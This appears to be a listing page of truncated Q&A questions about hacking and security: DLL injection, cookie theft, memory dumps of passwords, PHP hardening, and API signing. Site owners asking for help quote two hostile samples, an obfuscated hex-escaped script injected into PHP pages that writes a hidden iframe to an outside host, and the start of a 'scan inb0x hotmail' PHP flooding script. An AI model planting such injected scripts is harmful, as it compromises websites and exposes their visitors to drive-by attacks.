hacking

Outlook security

Hi to Everyone!! Is there any other way to get rid of this outlook security message? "A program is trying to automatically send e-mail on your behalf ... and so on" and it gives me an option to select Yes , No & Help. Im currently developing an outlook automation app using Ms Access. Everytime I issue Send command this message popups,...

The simplest code hacking

I have the following code: #include <iostream> #include <string> void main() { std::string str; std::cin>>str; if(str == "TheCorrectSerialNumber") std::cout<<"Hello world!!!"<<std::endl; } I need a decompilation or disassemblering tool which can help me by doing below listed steps find the "TheCorrectSerialNumber"....

Can someone steal a password from a Java application?

Hi, Suppose there is a String variable that holds a plain text password. Is there any possibility of reading this password using a memory dump. (Suppose using cheat engine.) I am puzzled with this JVM thing. Does JVM provide some sort of protection against this. If no what are the practices that I need to use to avoid such "stealing". ...

How secure is PHP?

I am somewhat new to PHP coding and I am aware that malicious users can hack a website if you have not sanitized your PHP code. What I am wondering is whether they need a data entry box (like for file submissions, or user-name/password entry fields)?. Do commands like "include (header.php)" also need some sort of security or are they inn...

sockets sniffer

Does someone know of a good .Net socket sniffer? I'm trying to build an IM sniffer that can show the Unicode chars correctly. TY ...

Wherein newbie disassembly queries are made.

I'm relatively(read: stupid newbie) familiar with disassembly but this bit stumped me: I have a set of save files compressed with zlib and a game that loads them. Their structure is known and once loaded, the structs in memory are identical to their corresponding save files. The issue is that the game was written in an ass-backwards, scr...

Help with tracking down hacking/malware attempts

I currently have a .net web application on a cluster based system (Rackspace cloud). In web config I have set up the following machine key. <machineKey validationKey='DE0...etc' decryptionKey='A97...etc' validation='SHA1'/> We were getting a quite a few of the following errors on a daily basis: Validation of viewstate MAC failed...

Security question: Is this a valid way to hack into Facebook applications? (and possibly Facebook)?

Your friend connects to Facebook and checks "remember me". Facebook creates a cookie on the browser. Your friends goes to the bathroom. You steal your friend's cookies from his browser and its data. You go home and make these cookies with that data. Assuming Facebook does not associate cookies + IP, you can gain access to the Facebook...

Downloading php files?

Is it possible to download php files from the server where they are located? I am a beginner in web area, and I worry that hackers may have special tools to download, see my code and understand where I have programmed vulnerable codes to hack my site. ...

LoadLibraryW doesn't work while LoadLibraryA does the job

I have written some sample program and DLL to learn the concept of DLL injection. My injection code to inject the DLL to the sample program is as follows (error handling omitted): std::wstring dll(L"D:\\Path\\to\\my\\DLL.dll"); LPTHREAD_START_ROUTINE pLoadLibraryW = (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW")...

Harmless hacking: Trick an application into thinking that a local file has actually come from a server

I've got a flash application (not written by me) which is accessing a configuration file which present on a http server. There are a lot of settings in the config file which seem to affect its behaviour. I'm not interested in decompiling the swf file or getting too deep into this. Basically I would like to try to alter the behaviour o...

API authentication design and hackability

Question: Is this API authentication technique easily hackable? apiKey = "123456789" apiCallId = "1256341451" apiSecret = "67d48e91ab2b7471d4be2a8c2e007d13" sig = md5(apiKey + apiCallId + apiSecret) = 09c297a354219f173bfc49c2e203ce03 where apiKey: some unique identifier for the user apiCallId: a unique integer that ...

scriptkiddie flooding my website with this snippit

hey, someone outthere is trying to flood my website with some script. luckly my application caught it i just wanna know what this code is doing <script> <!-- document.write(unescape("<?php //================================= // // scan inb0x hotmail v3.0 // // coded by FilhOte_Ccs and LOST // re-c0d3d by delet // // //================...

JavaScript being injected in my PHP Pages

I have a website, and I just discoverd that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it? <script> var x = unescape("%68% (**** some other hex characters here ****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" ...

way to make a function aware who called it

in java is it possible to make a method aware of who called it (without changing parameters) and then return something else? public class MyClassA { public static final String someStirng = "this is some String" public String getSomeString () { return someString; } } public class MyClassB extends MyClassA { public...

prevent hack a site by linux multi Support ability

One of the site Hacking methods written in php in apache server The use Images with prefix. Php such as .php.gif that apache is trying to run it How can htaccess configuration to disable this feature ...

PHP http handling

Is there a way to prevent a php script from sending a http response when the script is finished executing? If not in php is it possible in any-other common web scripting langues? ...

Will this hack make apple furious? (Will the reject my app ?)

Hi, I have taken this code from http://stackoverflow.com/questions/883208/how-to-change-background-color-of-uialertview UIAlertView *theAlert = [[[UIAlertView alloc] initWithTitle:@"Atention" message: @"YOUR MESSAGE HERE", nil) delegate:nil cancelButtonTitle:@"OK" otherButtonTitles:nil] autorelease]; [theAlert show]; UI...

Website hacking - Why it is always possible to do?

Dear web developers, we know that each executable file can be reverse engineered (disassembled, decompiled). No mater how strong security you will implement, anyway if crackers want to, they do crack!!! Just that is a question of time. What about websites? May we say that website can be completely safe from attacks of hackers (we assum...

How to add mysites mail to whitelist?

hello friends, Currently I am developing a website.In this I have the option to send invittion.When I send the Invitation it going to spam folder.How can I send my site's mails to Inbox.Whether I nedd the trafic to add into whitelist?Or is there anyother way to make to directly send the email to Inbox.My site is developed in PHP......T...